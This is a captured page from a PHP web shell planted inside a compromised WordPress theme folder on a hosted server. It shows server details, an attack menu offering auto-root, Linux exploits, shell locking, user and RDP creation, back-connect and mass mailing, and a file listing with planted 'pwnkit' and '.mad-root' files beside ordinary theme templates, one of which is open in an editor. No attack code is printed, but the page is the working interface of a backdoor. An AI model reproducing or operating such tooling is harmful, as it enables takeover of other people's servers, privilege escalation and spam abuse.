Linux webm003.cluster129.gra.hosting.ovh.net 6.18.42-ovh-vps-grsec-zfs+ #1 SMP PREEMPT_DYNAMIC Wed Aug 5 15:59:48 CEST 2026 x86_64
Apache
: 10.129.20.3 | : 216.73.217.63
Cant Read [ /etc/named.conf ]
8.4.22
chloega
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
home /
chloega /
www /
wp-content /
themes /
bravada /
[ HOME SHELL ]
Name
Size
Permission
Action
admin
[ DIR ]
drwxr-xr-x
content
[ DIR ]
drwxr-xr-x
cryout
[ DIR ]
drwxr-xr-x
includes
[ DIR ]
drwxr-xr-x
languages
[ DIR ]
drwxr-xr-x
resources
[ DIR ]
drwxr-xr-x
.mad-root
0
B
-rw-r--r--
404.php
896
B
-rw-r--r--
archive.php
2.03
KB
-rw-r--r--
comments.php
1.45
KB
-rw-r--r--
footer.php
1009
B
-rw-r--r--
front-page.php
950
B
-rw-r--r--
functions.php
1.66
KB
-rw-r--r--
header.php
2.83
KB
-rw-r--r--
image.php
2.85
KB
-rw-r--r--
index.php
1.07
KB
-rw-r--r--
loco.xml
893
B
-rw-r--r--
page.php
658
B
-rw-r--r--
pwnkit
0
B
-rwxr-xr-x
readme.txt
16.47
KB
-rw-r--r--
screenshot.png
1.2
MB
-rw-r--r--
search.php
1.26
KB
-rw-r--r--
searchform.php
629
B
-rw-r--r--
sidebar-footer.php
475
B
-rw-r--r--
sidebar-left.php
1.21
KB
-rw-r--r--
sidebar-right.php
1.13
KB
-rw-r--r--
single.php
3.52
KB
-rw-r--r--
style.css
205.37
KB
-rw-r--r--
woocommerce.php
805
B
-rw-r--r--
wpml-config.xml
903
B
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : sidebar-right.php
<?php /** * The Sidebar that is normally displayed on the right side (Secondary). * * @package Bravada */ ?> <?php if ( is_active_sidebar( 'sidebar-1' ) || current_user_can( 'edit_theme_options' ) ): ?> <aside id="secondary" class="widget-area sidey" <?php cryout_schema_microdata( 'sidebar' );?>> <?php cryout_before_secondary_widgets_hook(); ?> <?php if ( is_active_sidebar( 'sidebar-1' ) ): dynamic_sidebar( 'sidebar-1' ); else: if ( current_user_can( 'edit_theme_options' ) ) { ?> <section class="widget-container widget-placeholder"> <h2 class="widget-title"><?php _e( 'Right Sidebar', 'bravada' ); ?></h2> <p> <?php printf( __( 'You currently have no widgets set in this sidebar. You can add widgets via the <a href="%s">Dashboard</a>.', 'bravada' ), esc_url( admin_url() . "widgets.php" ) ); echo "<br/>"; printf( __( 'To hide this sidebar, switch to a different Layout via the <a href="%s">Theme Customizations</a>.', 'bravada' ), esc_url( admin_url() . "customize.php" ) ); ?> </p> </section> <?php } endif; ?> <?php cryout_after_primary_widgets_hook(); ?> </aside> <?php endif;
Close